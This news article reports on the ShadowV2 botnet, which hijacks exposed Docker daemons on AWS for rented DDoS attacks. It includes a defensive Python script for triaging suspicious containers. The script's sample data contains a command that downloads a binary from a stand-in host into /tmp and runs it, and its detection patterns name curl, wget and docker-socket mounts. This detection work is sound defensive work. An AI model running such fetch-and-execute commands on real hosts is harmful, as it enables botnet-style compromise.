Redazione RHC: 24 September 2025 08:56
Amid growing criminal activity, Darktrace has uncovered a new campaign using the ShadowV2 botnet. Researchers detected the malicious activity on June 24, 2025, when their honeypots were triggered. The system relies on a Trojan written in Go that turns compromised Amazon Web Services cloud containers into fully-fledged nodes for DDoS attacks.
ShadowV2 is unique in that it exploits vulnerable Docker instances running on AWS EC2 virtual machines. The first step in the infection is the deployment of a helper container based on an Ubuntu image, which automatically installs the necessary tools.
Next, a separate container is created with a pre-compiled ELF executable that communicates with the command and control server at “shadow.aurozacloud[.]xyz”. The malware regularly sends heartbeat messages to this server and receives commands from it, including instructions to launch attacks.
The botnet’s control infrastructure is built with the Python FastAPI framework and the Pydantic library. The system’s web interface includes a login module and a control panel for operators, allowing them to add and edit users, set attack parameters, and specify target and exception lists. All of this indicates that ShadowV2 is a ready-to-use platform for DDoS attacks sold under a “pay-for-service” model.
Distributed attacks using ShadowV2 include advanced techniques. These include HTTP/2 Rapid Reset, an attack that can crash servers by rapidly opening and immediately cancelling large numbers of HTTP/2 streams, and a bypass of Cloudflare’s Under Attack mode. The bypass is implemented with the ChromeDP tool, which drives a headless Chrome instance to complete the JavaScript challenge and obtain the cookies that let subsequent requests through.
However, the reliability of this method is questionable, as many security solutions detect and block headless browser behavior.
Additionally, ShadowV2 uses a separate deployment module, also written in Python. This component takes over exposed Docker daemons and then deploys the malicious container. This approach allows attackers to minimize their presence on compromised hosts and hinder forensic analysis.
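The two-stage pattern described above (a generic Ubuntu helper container that installs tooling, followed by a container running a dropped binary, both deployed through an exposed Docker daemon) can be triaged from `docker inspect` output and the daemon configuration. The following is an added example written for this article, not code from Darktrace or from the botnet; the inspect records are constructed samples, the field names are the real Docker API ones, and the indicators are illustrative heuristics, not a signature.

```python
"""Flag containers and daemon settings matching the ShadowV2-style deployment pattern.

Constructed samples only; indicator names and thresholds are the author's own heuristics.
"""
import re

# Generic base images that legitimately run a packaged service are rare; a bare
# ubuntu/debian/alpine whose command installs tooling at runtime is suspicious.
BASE_IMAGES = re.compile(r"^(docker\.io/)?(library/)?(ubuntu|debian|alpine)(:[\w.-]+)?$")
TOOLING_CMDS = re.compile(r"\b(apt-get|apk|curl|wget|chmod \+x)\b")
TMP_EXEC = re.compile(r"^/(tmp|dev/shm|var/tmp)/")

def triage_container(record):
    """Return the indicator names that fire for one `docker inspect` record."""
    cfg = record.get("Config", {})
    host = record.get("HostConfig", {})
    argv = (cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or [])
    hits = []
    # Stage 1: generic base image bootstrapping tools at runtime (helper container).
    if BASE_IMAGES.match(cfg.get("Image", "")) and TOOLING_CMDS.search(" ".join(argv)):
        hits.append("base-image-installs-tooling")
    # Stage 2: dropped binary executed from a world-writable path (node container).
    if any(TMP_EXEC.match(arg) for arg in argv):
        hits.append("exec-from-tmp")
    # Host-escape primitives a deployer can request over the daemon API.
    if host.get("Privileged"):
        hits.append("privileged")
    if any(b.startswith("/var/run/docker.sock:") for b in host.get("Binds") or []):
        hits.append("docker-socket-mounted")
    return hits

def daemon_api_exposed(daemon_json):
    """True if daemon.json's `hosts` binds the API to a non-loopback TCP address."""
    for h in daemon_json.get("hosts", []):
        if h.startswith("tcp://") and not h.startswith(("tcp://127.", "tcp://localhost")):
            return True
    return False

# Constructed sample records (hypothetical names, not real indicators).
SAMPLES = [
    {"Name": "/helper", "Config": {"Image": "ubuntu:22.04", "Entrypoint": ["/bin/sh", "-c"],
     "Cmd": ["apt-get update && apt-get install -y curl && curl -o /tmp/agent http://example.invalid/a"]},
     "HostConfig": {"Privileged": False, "Binds": []}},
    {"Name": "/node", "Config": {"Image": "ubuntu:22.04", "Entrypoint": ["/tmp/agent"], "Cmd": []},
     "HostConfig": {"Privileged": True, "Binds": ["/var/run/docker.sock:/var/run/docker.sock"]}},
    {"Name": "/web", "Config": {"Image": "nginx:1.27", "Entrypoint": ["/docker-entrypoint.sh"],
     "Cmd": ["nginx", "-g", "daemon off;"]}, "HostConfig": {"Privileged": False, "Binds": []}},
]

if __name__ == "__main__":
    print("daemon exposed:", daemon_api_exposed({"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}))
    for r in SAMPLES:
        print(r["Name"], triage_container(r))
```

On a live host the same functions can be fed the JSON from `docker inspect $(docker ps -q)` and `/etc/docker/daemon.json`.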
What’s particularly alarming is the entire architecture’s focus on extensibility and reusability: the control API not only allows for customized attacks, but also allows the infrastructure to be scaled massively with full automation. ShadowV2 thus exemplifies a new generation of cybercrime, where malicious tools increasingly resemble legitimate SaaS products in terms of convenience and scalability.
Following this incident, F5 Labs reported another wave of activity: a botnet using browser headers disguised as Mozilla is conducting a massive internet scan for known vulnerabilities. In total, over 11,000 different user-agent strings associated with Mozilla-based browsers were detected.
Meanwhile, Cloudflare released its own report announcing the automatic blocking of the largest DDoS attack ever recorded. The recorded impact reached 22.2 Tbps with a peak of 10.6 billion packets per second. The attack lasted only 40 seconds, but its intensity set a new record in the history of cyber threats.
All of these events highlight the trend toward increasingly sophisticated attack tools and the growth of the “cybercrime-as-a-service” industry. Modern botnets like ShadowV2 are developed with scalability, functionality, and ease of use in mind, even for technically inexperienced clients.